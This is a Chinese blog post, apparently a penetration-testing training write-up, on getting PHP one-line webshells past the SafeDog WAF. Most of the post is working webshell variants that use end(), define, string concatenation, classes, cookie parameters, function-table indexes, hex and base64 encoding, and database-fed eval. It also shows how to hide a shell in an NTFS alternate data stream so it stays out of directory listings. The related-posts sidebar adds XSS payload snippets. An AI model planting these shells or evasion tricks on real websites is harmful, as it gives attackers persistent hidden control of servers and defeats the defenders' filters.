WAF绕过--小马绕过

最新推荐文章于 2024-05-19 23:37:32 发布
最新推荐文章于 2024-05-19 23:37:32 发布
阅读量847 收藏 7
点赞数 1
分类专栏: zkaq靶场 文章标签: php 一句话木马 waf waf绕过 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116951246
版权

WAF绕过之小马免杀

WAF:安全狗-Apache版 v4

正常的PHP一句话木马:
<?php eval($_REQUEST[6]);?>

对于这个正常的一句话木马,安全狗会拦截。

关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配]

我们尝试只写<?php eval();?> 发现没有拦截,但是加了 R E Q U E S T [ 6 ] 就 拦 截 了 那 么 我 们 是 不 是 可 以 尝 试 测 试 看 看 究 竟 拦 截 _REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截 REQUEST[6]_REQUEST[6]的那个部分。

然后测试发现,他拦截的是$_REQUEST[

那么我们只要不出现中括号就可以解决对吗?或者我们尝试把这个变量换一个就可以解决。

end()函数

end() 将数组的内部指针移动到最后一个单元并返回其值

绕过
<?php eval(end($_REQUEST))?>
常量定义 define

define:定义一个常量:difine(常量名,常量值)

绕过
<?php define("a",$_REQUEST[6]);eval(a);?>
字符串拼接+$$
绕过
<?php
$a = 'ass';
$b = 'ert';
$func = $a.$b;
$x = 'func';
$$x($_REQUEST[6]);
?>
函数分离
绕过
<?php
function func($a){
return $a;}
eval(func($_REQUEST[6]));
?>
定义类
绕过
<?php
class Test{
	public $a = '';
	function __destruct(){
		eval("$this->a");
	}
}
$t = new Test;
$t->a = ''.$_REQUEST[6];
?>
多方式传参
绕过
<?php
$cookie = $_COOKIE;
foreach($cookie as $key->$value){
	if($key=='assert'){
		$key($_REQUEST[6]);
	}
}
?>
已定义数组

get_defined_functions():返回数组,包含了所有已定义的函数,包括内置(internal) 和用户定义的函数。 可通过 a r r [ " i n t e r n a l " ] 来 访 问 系 统 内 置 函 数 , 通 过 arr["internal"]来访问系统内置函数, 通过 arr["internal"]访arr[“user”]来访问用户自定义函数.。

5.6.27:[850]=> string(6) “assert”

5.4.45:[841]=> string(6) “assert”

7.0.12:[763]=> string(6) “assert”

绕过
<?php
$a=get_defined_functions();
$a['internal'][841]($_REQUEST[6]);

?>
关键函数编码

对关键函数的字符串进行变换

绕过
<?php array_map("ass\x65rt",array($_REQUEST[6]));?>

\x65对应的字母是e
\x后面跟的是字符ASCII码的十六进制,e的ASCII码16进制为65

base64编码函数

assert的base64编码是:YXNzZXJ0

绕过
<?php 
$func = base64_decode("YXNzZXJ0");
$func($_REQUEST[6]);
?>

多次base64编码:

<?php eval(base64_decode(U2tZNVUxSldSbFpTVms1VlYzcGFaQT09));?>
外联数据库绕过
绕过
<?php
eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('127.0.0.1','root','root','test'),'select * from info'))['info']); 

?>

image-20210517194139068

windows 隐藏shell:nfs文件流(拿到shell后)

cmd:

echo helloworld >> /:test.txt

image-20210517200612260

test.txt文件不会显示在文件夹中。

但是可以使用1.php去包含test.txt

<?php 
include("/:test.txt")
?>

image-20210517200804415

隐藏:
echo "<?php eval($_REQUEST[6])?>" >> /:123.txt

image-20210517201101480

1.php:

<?php 

include("/:123.txt")
?>

(img-Qsc4GGZC-1621259989767)]

隐藏:
echo "<?php eval($_REQUEST[6])?>" >> /:123.txt

[外链图片转存中…(img-fJlQhLoH-1621259989768)]

1.php:

<?php 

include("/:123.txt")
?>

image-20210517201129285

wwxxee
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
CTF writeup 1_网络安全实验室
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4388
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
WAF绕过(上)
最新发布
A526847的博客
05-19 630
或者$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");自增运算:因为在PHP中,'a'++ => 'b','b'++ => 'c',所以我们如果得到了其中的一个字母,通过这个字符就可以得到 所有的字母。
安恒月赛 image up
weixin_30900589的博客
11-30 545
http://101.71.29.5:10007/index.php?page=login 仔细观察这个url的话会发现,存在文件包含。 而且并没有login.php而是login,猜测代码是 <?php include str."php"; 随便账号密码就能登陆,来到了一个上传页面,只能上传图片,回头看看题目 这里的思路明确了,文件包含加图片马。 在这时间统一的世界里,上传图...
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
渗透测试工具库-收藏版
baidu_38876334的博客
04-14 989
浩二一开始做渗透测试的时候收集超多的资料和工具,一直在文档里吃灰。对BillGates Linux Botnet系木马活动的监控工具。
伪造XFF头绕过服务器IP过滤
weixin_34367845的博客
11-20 1232
IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造 XFF字段 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。通俗来说,就是浏览器访问网站的IP。一般格式: X-Forwarded-For:...
XSS触发语句小结
7Riven's blog
01-01 2062
一、标准语句 <script>alert(/XSS/)</script> 二、尝试大小写 <sCript>alert(1)</scRipt> 三、使用<img>标签 1、windows事件 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
Simple Calc Writeup
子曰小玖的博客
05-23 1199
https://sploitfun.wordpress.com/2016/03/07/bkp-ctf-simple-calc-writeup/ Recently I got my hands dirty with CTF. My first attempt was 32c3 and I failed miserably at it, however my second attempt was f...
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2254
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
CTFWeb-BUUCTF竞赛真题WriteUp(1)
道阻且长,行则将至。
08-20 7806
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
安恒12月赛Web题解
0verWatch的博客
12-22 2875
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
CTF-Web-SQL注入
beihai2013
01-26 3197
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
waf绕过cookie
08-09
WAF绕过Cookie主要是通过修改请求方式或使用复参数绕过的方法。其中,修改请求方式是最常见且典型的绕过方式。在一些ASP或ASPx网站中,WAF可能对GET请求进行了过滤,但对Cookie甚至POST参数没有进行检测。因此,攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值